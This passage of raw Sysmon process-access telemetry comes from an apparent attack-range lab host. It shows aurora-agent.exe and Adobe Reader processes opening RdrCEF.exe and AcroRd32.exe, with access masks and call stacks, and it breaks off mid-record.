DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.965{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.965{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.965{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.965{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.965{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.889{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.889{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.885{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.884{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.883{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.882{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.881{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.881{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.880{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.879{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.878{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.877{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 